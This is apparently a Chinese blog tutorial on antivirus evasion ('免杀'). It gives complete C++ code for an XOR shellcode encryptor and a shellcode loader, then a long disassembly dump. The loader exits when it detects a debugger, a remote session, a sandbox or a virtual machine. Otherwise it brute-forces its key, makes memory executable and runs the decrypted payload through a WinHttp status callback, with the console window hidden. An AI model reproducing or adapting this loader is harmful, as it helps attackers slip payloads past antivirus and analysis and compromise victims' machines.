【免杀】一个正经的免杀解析:VT2/70
1.免杀学习与效果图
免杀很多渗透师傅都在学,但很多不知道怎么去学,学免杀精髓是啥?
偷!
不偷你还想自己一手惊遍天下人嘛,本文章源码作者为四五qq公众号锦鲤安全,尊重每一个沉浸在技术上的师傅。学习路就是先走前人路之后看自己能不能扩展了,能自己独创绝对是天才,反正我是混子。
效果图:
2.免杀思路
shellcode加密毁坏特征—>虚拟机检测进行反虚拟机—>反杀箱检测—>回调函数进行加载。
相比吾爱,看雪逆向病毒大佬可能没那么复杂,但也不是平时见的加个密,无脑开内存加载。
3.具体实现
3.1.shellcode加密
#include <iostream>
using namespace std;
unsigned char* encrypt(unsigned char* input, int len, unsigned int key) {
unsigned char* output = new unsigned char[len];
srand(key);
for (int i = 0; i < len; i++) {
output[i] = input[i] ^ key;
output[i] = output[i] ^ (rand() % len + 1);
}
return output;
}
unsigned char* decrypt(unsigned char* input, int len, unsigned int key) {
unsigned char* output = new unsigned char[len];
srand(key);
for (int i = 0; i < len; i++) {
output[i] = input[i] ^ (rand() % len + 1);
output[i] = output[i] ^ key;
}
return output;
}
int main() {
// 加密前的shellcode
unsigned char input[] = "..."
// 6位数的密钥
unsigned int key = 454545;
int len = sizeof input - 1;
cout << "Original message: " << input << endl;
unsigned char* encrypted = encrypt(input, len, key);
cout << "Encrypted message: ";
for (int i = 0; i < len; i++)
printf("\\x%x", encrypted[i]);
cout << endl;
unsigned char* decrypted = decrypt(encrypted, len, key);
cout << "Decrypted message: ";
for (int i = 0; i < len; i++)
printf("%c", decrypted[i]);
delete[] encrypted;
delete[] decrypted;
return 0;
}
具体加密算法就是,先进行异或加密,之后根据key生成随机值再来一次异或加密。
生成后的加密code
还有就是一个vs工具集的东西,vs2022反正很多已经被360智能学习日常误杀了,编译hello也一样。反正vs的东西都换换玩说不定有惊喜
3.2.加载器实现
#include <iostream>
#include <Winsock2.h>
#include <iphlpapi.h>
#include<Windows.h>
#include <chrono>
#include <thread>
#include<winhttp.h>
#pragma comment(lib,"Winhttp.lib")
#pragma comment(lib, "iphlpapi.lib")
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" ) // 设置入口地址
using namespace std;
//加密后的shellcode
unsigned char lpAddress[] = "";
unsigned char* decrypt(unsigned char* input, int len, unsigned int key) {
unsigned char* output = new unsigned char[len];
srand(key);
for (int i = 0; i < len; i++) {
output[i] = input[i] ^ (rand() % len + 1);
output[i] = output[i] ^ key;
}
return output;
}
bool detect_sandbox() {
bool is_sandbox = false;
auto start_time = chrono::high_resolution_clock::now();
this_thread::sleep_for(chrono::milliseconds(100));
auto end_time = chrono::high_resolution_clock::now();
auto elapsed_time = chrono::duration_cast<chrono::milliseconds>(end_time - start_time);
cout << elapsed_time.count() << endl;
if (elapsed_time.count() < 100) {
is_sandbox = true;
}
return is_sandbox;
}
int GetNumPages() {
// 获取系统页面文件大小信息
MEMORYSTATUSEX statex;
statex.dwLength = sizeof(statex);
if (!GlobalMemoryStatusEx(&statex)) {
cerr << "Failed to get system memory status." << endl;
return 1;
}
SYSTEM_INFO systemInfo;
GetSystemInfo(&systemInfo);
return statex.ullTotalPageFile / systemInfo.dwPageSize;
}
int GetNumDrives() {
DWORD drives = GetLogicalDrives();
int numDrives = 0;
for (char i = 0; i < 26; i++) {
if (drives & (1 << i)) {
char path[4];
sprintf_s(path, "%c:\\", 'A' + i);
UINT type = GetDriveTypeA(path);
if (type == DRIVE_FIXED || type == DRIVE_REMOVABLE) {
numDrives++;
}
}
}
return numDrives;
}
int GetNumAdapters() {
DWORD dwSize = 0;
GetAdaptersAddresses(AF_UNSPEC, GAA_FLAG_INCLUDE_PREFIX, NULL, NULL, &dwSize);
PIP_ADAPTER_ADDRESSES pAddresses = (PIP_ADAPTER_ADDRESSES)new BYTE[dwSize];
GetAdaptersAddresses(AF_UNSPEC, GAA_FLAG_INCLUDE_PREFIX, NULL, pAddresses, &dwSize);
int numAdapters = 0;
PIP_ADAPTER_ADDRESSES pCurrAddresses = pAddresses;
while (pCurrAddresses) {
if (pCurrAddresses->OperStatus == IfOperStatusUp) {
numAdapters++;
}
pCurrAddresses = pCurrAddresses->Next;
}
return numAdapters;
}
int main() {
if (IsDebuggerPresent()) {
cout << "调试器检测到当前程序" << endl;
return 1;
}
BOOL bDebuggerPresent = FALSE;
if (CheckRemoteDebuggerPresent(GetCurrentProcess(), &bDebuggerPresent) && bDebuggerPresent) {
cout << "远程调试器检测到当前程序" << endl;
return 1;
}
if (GetSystemMetrics(SM_REMOTESESSION) != 0) {
cout << "当前程序正在远程桌面会话中" << endl;
return 1;
}
if (detect_sandbox()) {
cout << "This program may be running in a sandbox!" << endl;
return 1;
}
int numPages = GetNumPages();
cout << numPages << endl;
if (numPages < 4000000) {
cout << "The memory page is smaller than normal and may be in a virtual machine environment" << endl;
return 1;
}
int numDrives = GetNumDrives();
cout << numDrives << endl;
if (numDrives < 2) {
cout << "The number of hard disks is smaller than normal, and the hard disks may be in a VM environment" << endl;
return 1;
}
SYSTEM_INFO systemInfo;
GetSystemInfo(&systemInfo);
cout << systemInfo.dwNumberOfProcessors << endl;
if (systemInfo.dwNumberOfProcessors <= 4) {
cout << "If the number of cpus is smaller than normal, the system may be running on a VM" << endl;
return 1;
}
int numAdapters = GetNumAdapters();
cout << numAdapters << endl;
if (numAdapters < 2) {
cout << "The number of network adapters is smaller than normal, and the network adapter may be in a VM environment" << endl;
return 1;
}
int i = 500;
while (i--) {
// 获取开始时间
auto start_time = chrono::high_resolution_clock::now();
// 延迟100毫秒
this_thread::sleep_for(chrono::milliseconds(100));
// 获取结束时间
auto end_time = chrono::high_resolution_clock::now();
// 计算时间差
auto elapsed_time = chrono::duration_cast<chrono::milliseconds>(end_time - start_time);
srand(time(NULL));
// 密钥454545先减去100毫秒,再减去15得454430,再加上时间差和0-30的随机数碰撞出原key
unsigned char* decrypted = decrypt(lpAddress, sizeof lpAddress - 1, 454430 + elapsed_time.count() + (rand() % 30));
if (decrypted[0] == 0xfc and decrypted[1] == 0x48) {
DWORD lpflOldProtect;
VirtualProtect(decrypted, sizeof lpAddress - 1, PAGE_EXECUTE_READWRITE, &lpflOldProtect);
HINTERNET hSession = WinHttpOpen(L"User Agent", WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0);
WINHTTP_STATUS_CALLBACK callback = WinHttpSetStatusCallback(hSession, (WINHTTP_STATUS_CALLBACK)decrypted, WINHTTP_CALLBACK_FLAG_HANDLES, 0);
WinHttpCloseHandle(hSession);
break;
}
}
return 0;
}
原先没有隐藏窗口,我这里加上隐藏控制台了。
大家应该能看到不少return 1;代表直接退出程序。
来看主函数流程
IsDebuggerPresent(),这个函数是cpp自带的一个函数,用来检测是否被调试,这里就不得不说多看看人家代码咋写的,不然上哪知道这个函数。
这里看下反汇编具体实现
我们按一个正向思维先去看他,首先是日常一个缓冲区的反汇编,不重要。
来到call IsDebug这条,我们深入跟进下看看咋实现的反调试检测。
他是将gs:【60h】的值传到rax,最后【rax+2】处值扩展为eax32位传输过去。可以看到最后eax,rax都为1也就是if结果为真,至于gs:【60h】内存储的是一个地址,再根据地址加2获得1,至于怎么实现判断的还是蛮神奇的,但都被微软藏起来了。
那最后结果可想而知,eax为1结果为真进入函数结束调试。
至于后边类似的两个都是和反调试检测差不多的
反调试ok结束,接着是反杀盒;既然是学习那就学明白,代码看懂。
1.这里首先设置最后出口参数载体,毕竟是if判断是否在沙盒,bool值进行传递。auto这个类型可以理解为自适应类型,很方便。
2.设开始时间与结束时间是否一致,这里利用沙盒加速判断是否在沙盒内。
3.函数我看不懂啊,我直接看汇编给各位师傅讲下原理吧。
来到反汇编,看不懂别慌,对着看,谁还不是个菜鸡了
这里找找关键词,sleep_for,那这之前的都是start_time了,毕竟用的是个高精度计数,可以理解是吧。
那后边的这个就和我没关系啦,数学好的自己看
ok回到正题,反汇编奈何学历小学毕业看不懂阿,那还是老实的凭借意淫来看看吧。
首先开始时间进行一波记录,例如是早上八点,接着还想眯一会,眯个100秒对吧,眯完了很好,10点了迟到直接摆烂不去上班了。
这个elapsed_time就是精确计算下开始到结束准确时间,毕竟沙盒加速,那么小于100我就确认是在沙盒了呗。这反沙盒就基本这意思吧,主要函数确实没见过,又学到了。知识就是力量啊。
对于后边关于硬件检测,看完我也是终于晓得为啥分析病毒有那么多都在检测文件,系统信息啥的了,反虚拟机的干活。这里就不细讲了
最后解密,太复杂了,我不会,就那样。
主要回调函数,前边各种逃逸就为了最后这个执行,而现在常用的回调函数原理到底是什么,一起来看看
入口参数传递
进到call,害,看个毛。
winhttp.dll!WinHttpSetStatusCallback(void):
00007FF8456A5E10 40 55 push rbp
00007FF8456A5E12 56 push rsi
00007FF8456A5E13 41 54 push r12
00007FF8456A5E15 41 55 push r13
00007FF8456A5E17 41 56 push r14
00007FF8456A5E19 41 57 push r15
00007FF8456A5E1B 48 8D 6C 24 D1 lea rbp,[rsp-2Fh]
00007FF8456A5E20 48 81 EC B8 00 00 00 sub rsp,0B8h
00007FF8456A5E27 48 8B 05 12 04 10 00 mov rax,qword ptr [__security_cookie (07FF8457A6240h)]
00007FF8456A5E2E 48 33 C4 xor rax,rsp
00007FF8456A5E31 48 89 45 17 mov qword ptr [rbp+17h],rax
00007FF8456A5E35 83 3D 1C 12 10 00 00 cmp dword ptr [GlobalDataInitialized (07FF8457A7058h)],0
00007FF8456A5E3C 4D 8B F9 mov r15,r9
00007FF8456A5E3F 45 8B F0 mov r14d,r8d
00007FF8456A5E42 44 89 45 AF mov dword ptr [rbp-51h],r8d
00007FF8456A5E46 4C 8B EA mov r13,rdx
00007FF8456A5E49 48 8B F1 mov rsi,rcx
00007FF8456A5E4C 0F 84 A0 2E 05 00 je CStringTemplate<char>::SetString+0BF04h (07FF8456F8CF2h)
00007FF8456A5E52 33 C0 xor eax,eax
00007FF8456A5E54 48 89 9C 24 08 01 00 00 mov qword ptr [rsp+108h],rbx
00007FF8456A5E5C 48 89 BC 24 B0 00 00 00 mov qword ptr [rsp+0B0h],rdi
00007FF8456A5E64 49 C7 C4 FF FF FF FF mov r12,0FFFFFFFFFFFFFFFFh
00007FF8456A5E6B 33 FF xor edi,edi
00007FF8456A5E6D 4C 89 65 B7 mov qword ptr [rbp-49h],r12
00007FF8456A5E71 38 05 F1 10 10 00 cmp byte ptr [WinHttpEtwInitialized (07FF8457A6F68h)],al
00007FF8456A5E77 0F 57 C0 xorps xmm0,xmm0
00007FF8456A5E7A 48 89 7D BF mov qword ptr [rbp-41h],rdi
00007FF8456A5E7E 0F 11 45 CF movups xmmword ptr [rbp-31h],xmm0
00007FF8456A5E82 89 45 DF mov dword ptr [rbp-21h],eax
00007FF8456A5E85 48 89 45 C7 mov qword ptr [rbp-39h],rax
00007FF8456A5E89 0F 84 E3 01 00 00 je WinHttpSetStatusCallback+262h (07FF8456A6072h)
00007FF8456A5E8F 48 85 F6 test rsi,rsi
00007FF8456A5E92 0F 84 05 05 00 00 je WinHttpSetStatusCallback+58Dh (07FF8456A639Dh)
00007FF8456A5E98 F6 05 03 10 10 00 01 test byte ptr [g_rgFastWppEnabledFlagsPerLevel+12h (07FF8457A6EA2h)],1
00007FF8456A5E9F 0F 85 74 2E 05 00 jne CStringTemplate<char>::SetString+0BF2Bh (07FF8456F8D19h)
00007FF8456A5EA5 BA 57 69 6C 64 mov edx,646C6957h
00007FF8456A5EAA 48 8B CE mov rcx,rsi
00007FF8456A5EAD 48 8B DE mov rbx,rsi
00007FF8456A5EB0 E8 0B 38 00 00 call HANDLE_OBJECT::IsValid (07FF8456A96C0h)
00007FF8456A5EB5 85 C0 test eax,eax
00007FF8456A5EB7 0F 85 7E 2E 05 00 jne CStringTemplate<char>::SetString+0BF4Dh (07FF8456F8D3Bh)
00007FF8456A5EBD F6 05 DC 0F 10 00 80 test byte ptr [g_rgFastWppEnabledFlagsPerLevel+10h (07FF8457A6EA0h)],80h
00007FF8456A5EC4 0F 85 88 2E 05 00 jne CStringTemplate<char>::SetString+0BF64h (07FF8456F8D52h)
00007FF8456A5ECA 8B 46 30 mov eax,dword ptr [rsi+30h]
00007FF8456A5ECD 85 C0 test eax,eax
00007FF8456A5ECF 0F 85 98 2E 05 00 jne CStringTemplate<char>::SetString+0BF7Fh (07FF8456F8D6Dh)
00007FF8456A5ED5 8B 46 2C mov eax,dword ptr [rsi+2Ch]
00007FF8456A5ED8 85 C0 test eax,eax
00007FF8456A5EDA 0F 8E C3 2E 05 00 jle CStringTemplate<char>::SetString+0BFB5h (07FF8456F8DA3h)
00007FF8456A5EE0 8D 48 01 lea ecx,[rax+1]
00007FF8456A5EE3 F0 0F B1 4E 2C lock cmpxchg dword ptr [rsi+2Ch],ecx
00007FF8456A5EE8 0F 85 AA 2E 05 00 jne CStringTemplate<char>::SetString+0BFAAh (07FF8456F8D98h)
00007FF8456A5EEE F6 05 AD 0F 10 00 10 test byte ptr [g_rgFastWppEnabledFlagsPerLevel+12h (07FF8457A6EA2h)],10h
00007FF8456A5EF5 0F 85 B2 2E 05 00 jne CStringTemplate<char>::SetString+0BFBFh (07FF8456F8DADh)
00007FF8456A5EFB F6 05 9E 0F 10 00 80 test byte ptr [g_rgFastWppEnabledFlagsPerLevel+10h (07FF8457A6EA0h)],80h
00007FF8456A5F02 0F 85 CA 2E 05 00 jne CStringTemplate<char>::SetString+0BFE4h (07FF8456F8DD2h)
00007FF8456A5F08 0F B6 05 8B 0F 10 00 movzx eax,byte ptr [g_rgFastWppEnabledFlagsPerLevel+0Ah (07FF8457A6E9Ah)]
00007FF8456A5F0F A8 01 test al,1
00007FF8456A5F11 0F 85 D5 2E 05 00 jne CStringTemplate<char>::SetString+0BFFEh (07FF8456F8DECh)
00007FF8456A5F17 85 FF test edi,edi
00007FF8456A5F19 0F 85 ED 2E 05 00 jne CStringTemplate<char>::SetString+0C01Eh (07FF8456F8E0Ch)
00007FF8456A5F1F 48 89 5D C7 mov qword ptr [rbp-39h],rbx
00007FF8456A5F23 F6 05 78 0F 10 00 01 test byte ptr [g_rgFastWppEnabledFlagsPerLevel+12h (07FF8457A6EA2h)],1
00007FF8456A5F2A 0F 85 11 2F 05 00 jne CStringTemplate<char>::SetString+0C053h (07FF8456F8E41h)
00007FF8456A5F30 48 85 DB test rbx,rbx
00007FF8456A5F33 0F 84 35 01 00 00 je WinHttpSetStatusCallback+25Eh (07FF8456A606Eh)
00007FF8456A5F39 83 7D DF 00 cmp dword ptr [rbp-21h],0
00007FF8456A5F3D 0F 85 1B 2F 05 00 jne CStringTemplate<char>::SetString+0C070h (07FF8456F8E5Eh)
00007FF8456A5F43 33 C0 xor eax,eax
00007FF8456A5F45 48 8D 7D CF lea rdi,[rbp-31h]
00007FF8456A5F49 0F 57 C0 xorps xmm0,xmm0
00007FF8456A5F4C 48 8D 55 F7 lea rdx,[rbp-9]
00007FF8456A5F50 45 33 F6 xor r14d,r14d
00007FF8456A5F53 0F 57 C9 xorps xmm1,xmm1
00007FF8456A5F56 0F 11 4D E7 movups xmmword ptr [rbp-19h],xmm1
00007FF8456A5F5A B9 10 00 00 00 mov ecx,10h
00007FF8456A5F5F 48 81 C3 B8 00 00 00 add rbx,0B8h
00007FF8456A5F66 F3 AA rep stos byte ptr [rdi]
00007FF8456A5F68 44 89 75 DF mov dword ptr [rbp-21h],r14d
00007FF8456A5F6C 48 8D 7D CF lea rdi,[rbp-31h]
00007FF8456A5F70 0F 11 45 07 movups xmmword ptr [rbp+7],xmm0
00007FF8456A5F74 B9 10 00 00 00 mov ecx,10h
00007FF8456A5F79 F3 AA rep stos byte ptr [rdi]
00007FF8456A5F7B 48 8D 7D E7 lea rdi,[rbp-19h]
00007FF8456A5F7F 44 89 75 AB mov dword ptr [rbp-55h],r14d
00007FF8456A5F83 B9 10 00 00 00 mov ecx,10h
00007FF8456A5F88 F3 AA rep stos byte ptr [rdi]
00007FF8456A5F8A 8D 48 01 lea ecx,[rax+1]
00007FF8456A5F8D 0F 11 45 F7 movups xmmword ptr [rbp-9],xmm0
00007FF8456A5F91 48 FF 15 80 AC 0D 00 call qword ptr [__imp_EventActivityIdControl (07FF845780C18h)]
00007FF8456A5F98 0F 1F 44 00 00 nop dword ptr [rax+rax]
00007FF8456A5F9D 85 C0 test eax,eax
00007FF8456A5F9F 0F 8F CB 2E 05 00 jg CStringTemplate<char>::SetString+0C082h (07FF8456F8E70h)
00007FF8456A5FA5 0F 88 D4 2E 05 00 js CStringTemplate<char>::SetString+0C091h (07FF8456F8E7Fh)
00007FF8456A5FAB 0F 28 45 F7 movaps xmm0,xmmword ptr [rbp-9]
00007FF8456A5FAF 66 0F 7F 45 E7 movdqa xmmword ptr [rbp-19h],xmm0
00007FF8456A5FB4 48 85 DB test rbx,rbx
00007FF8456A5FB7 0F 84 CE 2E 05 00 je CStringTemplate<char>::SetString+0C09Dh (07FF8456F8E8Bh)
00007FF8456A5FBD 48 8B D3 mov rdx,rbx
00007FF8456A5FC0 44 89 75 AB mov dword ptr [rbp-55h],r14d
00007FF8456A5FC4 B9 02 00 00 00 mov ecx,2
00007FF8456A5FC9 48 FF 15 48 AC 0D 00 call qword ptr [__imp_EventActivityIdControl (07FF845780C18h)]
00007FF8456A5FD0 0F 1F 44 00 00 nop dword ptr [rax+rax]
00007FF8456A5FD5 85 C0 test eax,eax
00007FF8456A5FD7 0F 8F C0 2E 05 00 jg CStringTemplate<char>::SetString+0C0AFh (07FF8456F8E9Dh)
00007FF8456A5FDD 0F 88 C9 2E 05 00 js CStringTemplate<char>::SetString+0C0BEh (07FF8456F8EACh)
00007FF8456A5FE3 0F 28 45 E7 movaps xmm0,xmmword ptr [rbp-19h]
00007FF8456A5FE7 48 8B 7D C7 mov rdi,qword ptr [rbp-39h]
00007FF8456A5FEB 0F 11 45 CF movups xmmword ptr [rbp-31h],xmm0
00007FF8456A5FEF C7 45 DF 01 00 00 00 mov dword ptr [rbp-21h],1
00007FF8456A5FF6 F6 05 A5 0E 10 00 01 test byte ptr [g_rgFastWppEnabledFlagsPerLevel+12h (07FF8457A6EA2h)],1
00007FF8456A5FFD 0F 85 B5 2E 05 00 jne CStringTemplate<char>::SetString+0C0CAh (07FF8456F8EB8h)
00007FF8456A6003 BA 57 69 6C 64 mov edx,646C6957h
00007FF8456A6008 48 8B CF mov rcx,rdi
00007FF8456A600B E8 B0 36 00 00 call HANDLE_OBJECT::IsValid (07FF8456A96C0h)
00007FF8456A6010 44 8B F0 mov r14d,eax
00007FF8456A6013 85 C0 test eax,eax
00007FF8456A6015 75 46 jne WinHttpSetStatusCallback+24Dh (07FF8456A605Dh)
00007FF8456A6017 F6 05 82 0E 10 00 80 test byte ptr [g_rgFastWppEnabledFlagsPerLevel+10h (07FF8457A6EA0h)],80h
00007FF8456A601E 0F 85 AE 2E 05 00 jne CStringTemplate<char>::SetString+0C0E4h (07FF8456F8ED2h)
00007FF8456A6024 4C 8B 47 20 mov r8,qword ptr [rdi+20h]
00007FF8456A6028 41 8B C4 mov eax,r12d
00007FF8456A602B F0 0F C1 47 2C lock xadd dword ptr [rdi+2Ch],eax
00007FF8456A6030 83 E8 01 sub eax,1
00007FF8456A6033 0F 84 B4 2E 05 00 je CStringTemplate<char>::SetString+0C0FFh (07FF8456F8EEDh)
00007FF8456A6039 33 DB xor ebx,ebx
00007FF8456A603B F6 05 60 0E 10 00 10 test byte ptr [g_rgFastWppEnabledFlagsPerLevel+12h (07FF8457A6EA2h)],10h
00007FF8456A6042 0F 85 AF 2E 05 00 jne CStringTemplate<char>::SetString+0C109h (07FF8456F8EF7h)
00007FF8456A6048 85 DB test ebx,ebx
00007FF8456A604A 0F 85 C5 2E 05 00 jne CStringTemplate<char>::SetString+0C127h (07FF8456F8F15h)
00007FF8456A6050 F6 05 49 0E 10 00 80 test byte ptr [g_rgFastWppEnabledFlagsPerLevel+10h (07FF8457A6EA0h)],80h
00007FF8456A6057 0F 85 DC 2E 05 00 jne CStringTemplate<char>::SetString+0C14Bh (07FF8456F8F39h)
00007FF8456A605D F6 05 3E 0E 10 00 01 test byte ptr [g_rgFastWppEnabledFlagsPerLevel+12h (07FF8457A6EA2h)],1
00007FF8456A6064 0F 85 E9 2E 05 00 jne CStringTemplate<char>::SetString+0C165h (07FF8456F8F53h)
00007FF8456A606A 44 8B 75 AF mov r14d,dword ptr [rbp-51h]
00007FF8456A606E 48 8B 7D BF mov rdi,qword ptr [rbp-41h]
00007FF8456A6072 F6 05 27 0E 10 00 02 test byte ptr [g_rgFastWppEnabledFlagsPerLevel+10h (07FF8457A6EA0h)],2
00007FF8456A6079 0F 85 EE 2E 05 00 jne CStringTemplate<char>::SetString+0C17Fh (07FF8456F8F6Dh)
00007FF8456A607F 4D 85 ED test r13,r13
00007FF8456A6082 74 09 je WinHttpSetStatusCallback+27Dh (07FF8456A608Dh)
00007FF8456A6084 45 85 F6 test r14d,r14d
00007FF8456A6087 0F 84 05 2F 05 00 je CStringTemplate<char>::SetString+0C1A4h (07FF8456F8F92h)
00007FF8456A608D 4D 85 FF test r15,r15
00007FF8456A6090 0F 85 FC 2E 05 00 jne CStringTemplate<char>::SetString+0C1A4h (07FF8456F8F92h)
00007FF8456A6096 48 85 F6 test rsi,rsi
00007FF8456A6099 0F 84 17 03 00 00 je WinHttpSetStatusCallback+5A6h (07FF8456A63B6h)
00007FF8456A609F F6 05 FC 0D 10 00 01 test byte ptr [g_rgFastWppEnabledFlagsPerLevel+12h (07FF8457A6EA2h)],1
00007FF8456A60A6 0F 85 F0 2E 05 00 jne CStringTemplate<char>::SetString+0C1AEh (07FF8456F8F9Ch)
00007FF8456A60AC BA 57 69 6C 64 mov edx,646C6957h
00007FF8456A60B1 48 8B CE mov rcx,rsi
00007FF8456A60B4 48 8B FE mov rdi,rsi
00007FF8456A60B7 E8 04 36 00 00 call HANDLE_OBJECT::IsValid (07FF8456A96C0h)
00007FF8456A60BC 85 C0 test eax,eax
00007FF8456A60BE 0F 85 FE 2E 05 00 jne CStringTemplate<char>::SetString+0C1D4h (07FF8456F8FC2h)
00007FF8456A60C4 F6 05 D5 0D 10 00 80 test byte ptr [g_rgFastWppEnabledFlagsPerLevel+10h (07FF8457A6EA0h)],80h
00007FF8456A60CB 0F 85 08 2F 05 00 jne CStringTemplate<char>::SetString+0C1EBh (07FF8456F8FD9h)
00007FF8456A60D1 8B 46 30 mov eax,dword ptr [rsi+30h]
00007FF8456A60D4 85 C0 test eax,eax
00007FF8456A60D6 0F 85 18 2F 05 00 jne CStringTemplate<char>::SetString+0C206h (07FF8456F8FF4h)
00007FF8456A60DC 33 DB xor ebx,ebx
00007FF8456A60DE 8B 46 2C mov eax,dword ptr [rsi+2Ch]
00007FF8456A60E1 85 C0 test eax,eax
00007FF8456A60E3 0F 8E 41 2F 05 00 jle CStringTemplate<char>::SetString+0C23Ch (07FF8456F902Ah)
00007FF8456A60E9 8D 48 01 lea ecx,[rax+1]
00007FF8456A60EC F0 0F B1 4E 2C lock cmpxchg dword ptr [rsi+2Ch],ecx
00007FF8456A60F1 0F 85 28 2F 05 00 jne CStringTemplate<char>::SetString+0C231h (07FF8456F901Fh)
00007FF8456A60F7 F6 05 A4 0D 10 00 10 test byte ptr [g_rgFastWppEnabledFlagsPerLevel+12h (07FF8457A6EA2h)],10h
00007FF8456A60FE 0F 85 30 2F 05 00 jne CStringTemplate<char>::SetString+0C246h (07FF8456F9034h)
00007FF8456A6104 F6 05 95 0D 10 00 80 test byte ptr [g_rgFastWppEnabledFlagsPerLevel+10h (07FF8457A6EA0h)],80h
00007FF8456A610B 0F 85 48 2F 05 00 jne CStringTemplate<char>::SetString+0C26Bh (07FF8456F9059h)
00007FF8456A6111 0F B6 05 82 0D 10 00 movzx eax,byte ptr [g_rgFastWppEnabledFlagsPerLevel+0Ah (07FF8457A6E9Ah)]
00007FF8456A6118 A8 01 test al,1
00007FF8456A611A 0F 85 53 2F 05 00 jne CStringTemplate<char>::SetString+0C285h (07FF8456F9073h)
00007FF8456A6120 85 DB test ebx,ebx
00007FF8456A6122 0F 85 6B 2F 05 00 jne CStringTemplate<char>::SetString+0C2A5h (07FF8456F9093h)
00007FF8456A6128 48 89 7D BF mov qword ptr [rbp-41h],rdi
00007FF8456A612C F6 05 6F 0D 10 00 01 test byte ptr [g_rgFastWppEnabledFlagsPerLevel+12h (07FF8457A6EA2h)],1
00007FF8456A6133 0F 85 8F 2F 05 00 jne CStringTemplate<char>::SetString+0C2DAh (07FF8456F90C8h)
00007FF8456A6139 85 DB test ebx,ebx
00007FF8456A613B 0F 85 A4 2F 05 00 jne CStringTemplate<char>::SetString+0C2F7h (07FF8456F90E5h)
00007FF8456A6141 33 F6 xor esi,esi
00007FF8456A6143 4C 89 6D B7 mov qword ptr [rbp-49h],r13
00007FF8456A6147 4D 85 ED test r13,r13
00007FF8456A614A BA 57 69 6C 64 mov edx,646C6957h
00007FF8456A614F 48 8B CF mov rcx,rdi
00007FF8456A6152 41 0F 45 F6 cmovne esi,r14d
00007FF8456A6156 E8 65 35 00 00 call HANDLE_OBJECT::IsValid (07FF8456A96C0h)
00007FF8456A615B 8B D8 mov ebx,eax
00007FF8456A615D 85 C0 test eax,eax
00007FF8456A615F 0F 85 84 00 00 00 jne WinHttpSetStatusCallback+3D9h (07FF8456A61E9h)
00007FF8456A6165 48 8B 07 mov rax,qword ptr [rdi]
00007FF8456A6168 49 BA 70 0B 56 1E 70 A6 F8 AC mov r10,0ACF8A6701E560B70h
00007FF8456A6172 48 8B 40 08 mov rax,qword ptr [rax+8]
00007FF8456A6176 48 8B CF mov rcx,rdi
00007FF8456A6179 FF 15 E9 AC 0D 00 call qword ptr [__guard_xfg_dispatch_icall_fptr (07FF845780E68h)]
00007FF8456A617F 3D 48 52 65 71 cmp eax,71655248h
00007FF8456A6184 0F 85 69 01 00 00 jne WinHttpSetStatusCallback+4E3h (07FF8456A62F3h)
00007FF8456A618A 48 8D 8F 40 01 00 00 lea rcx,[rdi+140h]
00007FF8456A6191 BB F3 2E 00 00 mov ebx,2EF3h
00007FF8456A6196 4D 8B F4 mov r14,r12
00007FF8456A6199 48 FF 15 30 A7 0D 00 call qword ptr [__imp_EnterCriticalSection (07FF8457808D0h)]
00007FF8456A61A0 0F 1F 44 00 00 nop dword ptr [rax+rax]
00007FF8456A61A5 83 BF B0 01 00 00 01 cmp dword ptr [rdi+1B0h],1
00007FF8456A61AC 75 24 jne WinHttpSetStatusCallback+3C2h (07FF8456A61D2h)
00007FF8456A61AE 48 8B 45 B7 mov rax,qword ptr [rbp-49h]
00007FF8456A61B2 33 DB xor ebx,ebx
00007FF8456A61B4 4C 8B B7 A8 00 00 00 mov r14,qword ptr [rdi+0A8h]
00007FF8456A61BB 48 89 87 A8 00 00 00 mov qword ptr [rdi+0A8h],rax
00007FF8456A61C2 C7 87 B0 00 00 00 01 00 00 00 mov dword ptr [rdi+0B0h],1
00007FF8456A61CC 89 B7 B4 00 00 00 mov dword ptr [rdi+0B4h],esi
00007FF8456A61D2 48 8D 8F 40 01 00 00 lea rcx,[rdi+140h]
00007FF8456A61D9 48 FF 15 E0 A6 0D 00 call qword ptr [__imp_LeaveCriticalSection (07FF8457808C0h)]
00007FF8456A61E0 0F 1F 44 00 00 nop dword ptr [rax+rax]
00007FF8456A61E5 4C 89 75 B7 mov qword ptr [rbp-49h],r14
00007FF8456A61E9 48 8B 7D BF mov rdi,qword ptr [rbp-41h]
00007FF8456A61ED 48 85 FF test rdi,rdi
00007FF8456A61F0 74 7B je WinHttpSetStatusCallback+45Dh (07FF8456A626Dh)
00007FF8456A61F2 F6 05 A9 0C 10 00 01 test byte ptr [g_rgFastWppEnabledFlagsPerLevel+12h (07FF8457A6EA2h)],1
00007FF8456A61F9 0F 85 33 2F 05 00 jne CStringTemplate<char>::SetString+0C344h (07FF8456F9132h)
00007FF8456A61FF BA 57 69 6C 64 mov edx,646C6957h
00007FF8456A6204 48 8B CF mov rcx,rdi
00007FF8456A6207 E8 B4 34 00 00 call HANDLE_OBJECT::IsValid (07FF8456A96C0h)
00007FF8456A620C 44 8B F0 mov r14d,eax
00007FF8456A620F 85 C0 test eax,eax
00007FF8456A6211 75 45 jne WinHttpSetStatusCallback+448h (07FF8456A6258h)
00007FF8456A6213 F6 05 86 0C 10 00 80 test byte ptr [g_rgFastWppEnabledFlagsPerLevel+10h (07FF8457A6EA0h)],80h
00007FF8456A621A 0F 85 2C 2F 05 00 jne CStringTemplate<char>::SetString+0C35Eh (07FF8456F914Ch)
00007FF8456A6220 4C 8B 47 20 mov r8,qword ptr [rdi+20h]
00007FF8456A6224 F0 44 0F C1 67 2C lock xadd dword ptr [rdi+2Ch],r12d
00007FF8456A622A 41 83 EC 01 sub r12d,1
00007FF8456A622E 0F 84 33 2F 05 00 je CStringTemplate<char>::SetString+0C379h (07FF8456F9167h)
00007FF8456A6234 33 F6 xor esi,esi
00007FF8456A6236 F6 05 65 0C 10 00 10 test byte ptr [g_rgFastWppEnabledFlagsPerLevel+12h (07FF8457A6EA2h)],10h
00007FF8456A623D 0F 85 2E 2F 05 00 jne CStringTemplate<char>::SetString+0C383h (07FF8456F9171h)
00007FF8456A6243 85 F6 test esi,esi
00007FF8456A6245 0F 85 45 2F 05 00 jne CStringTemplate<char>::SetString+0C3A2h (07FF8456F9190h)
00007FF8456A624B F6 05 4E 0C 10 00 80 test byte ptr [g_rgFastWppEnabledFlagsPerLevel+10h (07FF8457A6EA0h)],80h
00007FF8456A6252 0F 85 5C 2F 05 00 jne CStringTemplate<char>::SetString+0C3C6h (07FF8456F91B4h)
